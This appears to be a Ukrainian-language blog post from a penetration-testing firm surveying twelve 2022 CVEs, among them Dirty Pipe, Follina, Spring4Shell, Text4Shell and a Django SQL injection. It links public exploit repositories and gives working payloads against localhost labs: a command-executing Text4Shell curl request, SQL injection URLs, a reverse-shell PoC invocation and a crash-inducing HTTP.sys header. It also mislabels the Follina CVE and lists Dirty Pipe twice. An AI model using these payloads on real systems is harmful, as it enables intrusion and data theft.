17 Січ, 2023

CVE TOP 12 in 2022 for penetration testing

Penetration Testing as a service (PTaaS)

Tests security measures and simulates attacks to identify weaknesses.

What is CVE or Common Vulnerabilities and Exposures?

CVE (англ. Common Vulnerabilities and Exposures) — це загальнодоступна і безкоштовна база даних / глосарій розкритих проблем кібербезпеки та їх класифікації. Ця база даних підтримується MITRE, корпорацією, що фінансується Міністерством внутрішньої безпеки США.

Кожна вразливість має унікальний ідентифікатор, оцінку та перелік у глосарії MITRE. Це було зроблено для того, щоб уніфікувати комунікацію між галузями безпеки та технологій, які тепер можуть посилатися на цей стандарт.

У глосарії використовується Загальна система оцінки вразливостей (англ. Common Vulnerability Scoring System) чи CVSS для оцінки серйозності або рівня загрози вразливості. Навіщо це потрібно? Нам важливо розуміти, скільки шкоди ми можемо отримати від тієї чи іншої проблеми з безпекою, а потім розставити пріоритети. Оцінка залежить не тільки від технології, але й від бізнес-структури компанії.

Top 10 detected threats for month in Ukraine ( (джерело) )

1  Multi.Desert.gen 16,67%
2 Win32.ShadowBrokers.ae 8,89%
3 IphoneOS.Vortex.a 7,41%
4 EMSOffce.CVE-2018-0802.gen 5,19%
5 AndroidOS.Psneuter.a 4,81%
6 Win32.Agent.gen 4,81%
7 AndroidOS.Lotoor.cd 3,70%
8 AndroidOS.Lotoor.bm 3,70%
9 Win32.ShadowBrokers.aa 2,96%
10 Java.CVE-2013-1493.x 2,96%

CVE-2022-0847

Рівень серйозності Високий : підвищення привілеїв у ядрі Linux

Уразливість дозволяє локальному користувачеві підвищити привілеї в системі. Уразливість існує через використання неініціалізованих ресурсів. Локальний користувач може перезаписати довільний файл в кеші сторінок, навіть якщо він доступний тільки для читання, і виконати довільний код в системі з підвищеними привілеями. Уразливість отримала назву Dirty Pipe. Постраждали версії ядра Linux, новіші за 5.8.

На даний момент уразливість була виправлена в наступних продуктах Linux kernel версій 5.16.11 / 5.15.25 / 5.10.102

Експлуатація

Клонуйте репозиторій і дотримуйтесь інструкцій по компіляції експлойта:

https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git

 

Usage exploit-1 : непривілейований користувач може змінити пароль root на "piped".

Для Linux 5.18.0 (яка не є вразливою):

Для Linux 5.11.0 (яка є вразливою):

Зауважте!

Також є сканер для CVE-2022-0847. Просто показує, чи є версія ядра Kali вразливою чи ні

https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker

Usage exploit-2 Ви можете вставляти і перезаписувати дані у пам'ять процесу SUID, доступну лише для читання, який виконується від імені користувача root.

Для Linux 5.18.0 (яка не є вразливою):

Для Linux 5.11.0 (яка є вразливою):

[+] hijacking suid binary..

[+] dropping suid shell..

[+] restoring suid binary..

[+] pooping root shell..

#id

uid=0(root) gid=0(root) groups=0(root), 1001(developer)

Джерела:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847

https://dirtypipe.cm4all.com/

https://www.cybersecurity-help.cz/vdb/SB2022030808

CVE-2022-0190

Рівень серйозності Критичний : віддалене виконання коду в Microsoft Windows

Уразливість дозволяє віддаленому зловмиснику виконати довільні команди командного інтерпретатора на цільовій системі. Уразливість існує через неправильну перевірку введення при обробці URL в Microsoft Windows Support Diagnostic Tool (MSDT). Віддалений неавторизований зловмисник може обманом змусити жертву завантажити (наприклад, з електронного листа) та відкрити спеціально створений файл, який викликає інструмент ms-msdt та виконує довільні команди ОС на цільовій системі. Успішна експлуатація цієї уразливості може призвести до повної зупинки роботи системи.

Експлуатація

Клонуйте репозиторій і дотримуйтесь інструкцій по компіляції експлойта:

https://github.com/JohnHammond/msdt-follina.git

Використання

Info:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30190

https://nvd.nist.gov/vuln/detail/CVE-2022-30190

https://www.cybersecurity-help.cz/vdb/SB2022053005

CVE-2022-0482

Рівень серйозності Критичний : оприлюднення конфіденційних даних в Easyappointments 1.4.3 

Дана уразливість дозволяє отримати приватну особисту інформацію неавторизованому користувачу в репозиторії GitHub alextselegidis/easyappointments до версії 1.4.3.

Експлуатація 

Клонуйте репозиторій і дотримуйтесь інструкцій по компіляції експлойта:

https://github.com/Acceis/exploit-CVE-2022-0482  

Використання 

Вразливий веб-сайт розміщено на localhost, і вся його база даних, включаючи ім'я користувача, пароль та інші PII-дані користувачів, була викачана.

Джерела:

https://nvd.nist.gov/vuln/detail/CVE-2022-0482 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0482 

https://packetstormsecurity.com/files/166701/Easy-Appointments-Information-Disclosure.html 

CVE-2022-26134

Рівень серйозності Критичний Injection in Atlassian Confluence

Confluence - це платформа для спільної роботи з документацією та управління проектами для команд. Він допомагає відстежувати статус проекту, пропонуючи централізований робочий простір для учасників. Ця CVE використовує ін'єкційну уразливість в мові виразів OGNL (Object-Graph Navigation Language) для Java, яка дозволяє неавторизованому зловмиснику виконати довільний код. OGNL використовується для отримання та встановлення властивостей об'єктів Java.

Експлуатація
 

Клонуйте репозиторій і дотримуйтесь інструкцій по компіляції експлойта:

https://github.com/h3v0x/CVE-2022-26134  

Використання 

В якості вразливого середовища використовується Atlassian Confluence 7.3.5. Неавторизований користувач може виконати довільний код.

Джерела: 

https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html  

https://nvd.nist.gov/vuln/detail/cve-2022-26134  

CVE-2022-0847 

Рівень серйозності Високий Розширення привілеїв у ядрі Linux 

Вразливість в ядрі Linux починаючи з версії 5.8, яка дозволяє перезаписати дані в будь-яких файлах, відкритих для читання. Це призводить до розширення привілеїв, оскільки непривілейовані процеси можуть впроваджувати код у кореневі процеси.

Експлуатація

Клонуйте репозиторій і дотримуйтесь інструкцій по компіляції експлойта:

https://github.com/arttnba3/CVE-2022-0847

Використання

1 Створіть SHA512Crypt хеш обраного вами пароля за допомогою openssl passwd -6 –salt THM “PASSWORD”

2 Скомпілюйте експлойт за допомогою команди gcc poc.c -o exploit

3 Запустіть експлойт, щоб додати користувача root у файл passwd:

Джерела: 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847  

https://nvd.nist.gov/vuln/detail/CVE-2022-0847  

https://tryhackme.com/room/dirtypipe  

CVE-2022-33891

Рівень серйозності Високий Уразливість до ін'єкції команд в Apache Spark Shell

Інтерфейс користувача Apache Spark пропонує можливість увімкнути ACL за допомогою конфігураційної опції spark.acls.enable. За допомогою фільтра автентифікації він перевіряє, чи має користувач дозволи на перегляд або зміну додатку. Якщо ACL увімкнено, кодовий шлях у HttpSecurityFilter може дозволити комусь виконати імітацію, надавши довільне ім'я користувача. Зловмисник може отримати доступ до функції перевірки дозволів, яка на основі введених даних створить команду командного інтерпретатора Unix і виконає її. Це призведе до виконання довільної команди оболонки від імені користувача, від імені якого наразі запущено Spark.

Це стосується версій Apache Spark 3.0.3. та ще раніших, версій з 3.1.1 по 3.1.2, а також версій з 3.2.0 по 3.2.1.

Експлуатація 

Клонуйте репозиторій і дотримуйтесь інструкцій по компіляції експлойта:

https://github.com/HuskyHacks/cve-2022-33891 

Usage exploit-1 Перевірте, чи не вразливий сервер: python3 poc.py -u http://localhost -p 8080 –check –verbose   

Для вразливої цілі:

Для невразливої цілі:

Usage exploit-2 You can use the poc to obtain reverse shell

python3 poc.py -u http://localhost -p 8080 –revshell -lh <IP> -lp <PORT> –verbose 

Для вразливої цілі:

Джерела: 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33891  

https://packetstormsecurity.com/files/168309/Apache-Spark-Unauthenticated-Command-Injection.html 

https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc  

CVE-2022-22965 

Рівень серйозності Критичний Spring4Shell – Spring Core RCE 

Додаток Spring MVC або Spring WebFlux, що працює на JDK 9+ може бути вразливим до віддаленого виконання коду (RCE) через прив'язування даних. Конкретний експлойт вимагає, щоб додаток працював на Tomcat як розгортання WAR. Якщо додаток розгорнуто у вигляді виконуваного файлу Spring Boot, тобто за замовчуванням, він не вразливий до експлойту. Однак, природа уразливості є більш загальною, і можуть існувати інші способи її використання.

Експлуатація 

Запустіть вразливий докер-образ Spring за допомогою команди:

docker run -d -p 8082:8080 –name springrce -it vulfocus/spring-core-rce-2022-03-29 

Це прив'язує вразливий Spring до адреси localhost:8082. Завітати http://localhost:8082 щоб перевірити

Клонуйте експолйт з https://github.com/TheGejr/SpringShell і виконайте наступну команду, щоб перевірити, чи є сервер вразливим

python3 exp.py –url http://localhost:8082 

Тепер цю вразливість можна використати, перейшовши за адресою shell та змінивши значення параметру cmd.

a) Для url: http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=whoami, повертається висновок whoami.

б) Для url: http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=ls 

Джерела:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965  

https://packetstormsecurity.com/files/167011/Spring4Shell-Spring-Framework-Class-Property-Remote-Code-Execution.html  

https://www.oracle.com/security-alerts/cpuapr2022.html  

CVE-2022-42889 

Рівень серйозності Критичний Apache commons-text vulnerability

Apache Commons Text виконує інтерполяцію змінних, що дозволяє динамічно оцінювати та розширювати властивості. Стандартним форматом для інтерполяції є “${prefix:name}”де " prefix " використовується для визначення місцезнаходження екземпляру org.apache.commons.text.lookup.StringLookup який виконує інтерполяцію. Починаючи з версії 1.5 і до версії 1.9, набір стандартних екземплярів Lookup включав інтерполятори, які могли призвести до довільного виконання коду або контакту з віддаленими серверами.

Ці запити такі: - "script" - виконувати вирази за допомогою механізму виконання сценаріїв JVM (javax.script) - "dns" - вирішувати записи dns - "url" - завантажувати значення з адрес, у тому числі з віддалених серверів Програми, що використовують інтерполяцію за замовчуванням в уражених версіях, можуть бути вразливими до віддаленого виконання коду або ненавмисного контакту з віддаленими серверами, якщо використовуються ненадійні значення конфігурації. Постраждали версії Apache Commons Text від 1.5 до 1.9.

Експлуатація 

Клонуйте репозиторій і пересувайтеся всередині нього https://github.com/akshayithape-devops/CVE-2022-42889-POC 

Створіть образ вразливої програми за допомогою Docker:

docker build –tag=test/text4shell . 

Створіть контейнер і зберіть образ: docker run -it -p 80:8080 -name text4shell test/text4l

Відкрийте нову вкладку терміналу і виконайте наступну команду для входу в термінал веб-сервера docker exec -it text4shell /bin/bash

Перелічіть всі файли в каталозі за допомогою команди ls і перегляньте text4shell-poc.jar

Відкрийте новий порт. Зробіть запит до веб-сервера. Атаку можна виконати, передавши рядок "${prefix:name}", де префікс - це вищезгаданий пошук: ${script:javascript:java.lang.Runtime.getRuntime().exec('touch newfile.txt')}

Наприклад: наступна команда повинна викликати запит на створення нового файлу на сервері:

curl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20hello.txt%27%29%7D

Перевірте, чи створено файл на сервері, знову використавши команду ls. Ми бачимо, що файл успішно створено. Це доводить, що довільне віддалене виконання коду можливе.

bash-4.4# ls
text4shell-poc.jar
bash-4.4# ls
hello.txt  ⠀⠀⠀test4shell-poc.jar
bash-4.4#

Джерела:

 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42889 

https://www.openwall.com/lists/oss-security/2022/10/13/4 

https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om 

 

 

CVE-2022-28346

Рівень серйозності Критичний SQL injection Vulnerability in Django

SQL уразливість знайдена в Django 2.2 до 2.2.28, 3.2 до 3.2.13 та 4.0 до 4.0.4..

Методи QuerySet.annotate(), aggregate() та extra() піддаються атакам SQL в псевдонімах стовпців через створений словник (з розширенням словника) в якості переданих аргументів ключових слів.

Експлуатація

Клонуйте репозиторій і дотримуйтесь інструкцій для запуску вразливого сервера:

https://github.com/ahsentekdemir/CVE-2022-28346 

Usage exploit-1 Перевірте версію використовуваної бази даних sqlite:

http://127.0.0.1:8000/poc?field=poc.title%22%20FROM%20%22poc_blog%22%20union%20SELECT%20%22-1,%22,sqlite_version(),%223%22%20–

див. відповідь на тест-1 3.39.4

Usage exploit-2 Перерахувати всі таблиці бази даних sqlite

http://127.0.0.1:8000/poc?field=poc.title%22%20FROM%20%22poc_blog%22%20union%20SELECT%20%22-1,%22,tbl_name,%223%22%20FROM%20sqlite_master%20WHERE%20type=%27table%27%20and%20tbl_n

ame%20NOT%20like%20%27sqlite_%%27%20–

Джерела:

 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28346 

https://www.djangoproject.com/weblog/2022/apr/11/security-releases 

https://lists.debian.org/debian-lts-announce/2022/04/msg00013.html 

CVE-2022-21907

Рівень серйозності Критичний Уразливість віддаленого виконання коду в стеку протоколу HTTP 

CVE-2022-21907 (CVSSv3 9.8) - це серйозна проблема, що впливає на стек протоколів HTTP (HTTP.sys). HTTP.sys - це драйвер пристрою ядра, присутній в сучасних операційних системах Microsoft Windows, який відповідає за обробку HTTP-трафіку в таких службах, як Microsoft IIS.

Через цю вразливість зловмисник може спровокувати сумнозвісний "синій екран смерті" на комп'ютері, на якому запущено невиправлений драйвер HTTP.sys. Збій, який може спричинити ця вразливість, є досить серйозним, і хоча після однієї атаки системи можуть перезапуститися і працювати належним чином, наступні атаки можуть призвести до повної відмови в обслуговуванні.

Експлуатація

 

Для відтворення цієї атаки необхідно запустити сервер IIS (в даному випадку використовується Windows 10 версії 2004 (OS Build: 19041.329)) і відкрити сторінку сервера на localhost.

Після того, як налаштування завершено, отримайте IP-адресу хоста і запустіть цю команду curl у терміналі.

curl 192.168.0.164:80 -sH “Accept-encoding: 354429474810858105277502,753225473272192695969

091599085146218998458873428858279498120&68&**82302744837636557755**9,21204530472516

23940869443373783750655190662992171177571578371548748405709,035045705988280018190324

33815484769110241925758402724193417475718971298,895259892660286842061499776,***********

*****************267816, *, ,” 

Після виконання команди ви побачите, що хост впав з "синім екраном смерті".

Цей Poc також можна відтворити за допомогою Git Repo: https://github.com/ZZ-SOCMAP/CVE-2022-21907

Використання

 

Джерела:

 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21907

https://nvd.nist.gov/vuln/detail/CVE-2022-21907

https://github.com/ZZ-SOCMAP/CVE-2022-21907

CVE-2022-21999

Рівень серйозності Високий Windows Print Spooler Підвищення рівня привілеїв (LPE)

Уразливість (CVE-2022-21999), яка має оцінку CVSS 7.8 (висока), дозволяє зловмиснику отримати підвищені права, якщо її успішно використати. Вразливий exe-файл повинен бути запущений від імені звичайного користувача, а для підвищення ролі слід виконати команду в shell, створивши на хості обліковий запис адміністратора.

Експлуатація

 

Для відтворення даної уразливості. На хості потрібен звичайний обліковий запис користувача, а потім користувач може підвищити привілеї, виконавши уразливий exe-файл для створення облікового запису адміністратора з паролем за замовчуванням: "Passw0rd!".

Цей Poc також можна відтворити за допомогою Git Repo: https://github.com/ly4k/SpoolFool

Використання

 

Джерела:

 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21999

https://nvd.nist.gov/vuln/detail/CVE-2022-21999

https://github.com/ly4k/SpoolFool

CVE-2022-1388

Рівень серйозності Критичний F5 BIG-IP iControl REST пошкодження RCE експлуатації через Java

Неофіційні запити можуть обійти автентифікацію iControl REST. Ця вразливість може дозволити неавторизованому зловмиснику з мережевим доступом до системи BIG-IP через порт керування та/або власні IP-адреси виконувати довільні системні команди, створювати чи видаляти файли або відключати сервіси.

Експлуатація

 

 

Як відтворити цю вразливість. Для визначення того, чи є хост вразливим, можна використати репозиторій Git'а на хості. В даному випадку для виявлення уразливості використовується вразливий хост із запущеним сервісом BIG-IP.

Для визначення серйозності тут вводиться довільний код, і сервер успішно пінгує назад з бажаним результатом без будь-якого механізму аутентифікації.

Цей Poc також можна відтворити за допомогою Git Repo: https://github.com/Zeyad-Azima/CVE-2022-1388

Використання

 

 

Джерела:

 

 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388

https://nvd.nist.gov/vuln/detail/CVE-2022-1388

https://github.com/Zeyad-Azima/CVE-2022-1388

Дякую за увагу!

Інші Послуги

Готові до безпеки?

зв'язатися з нами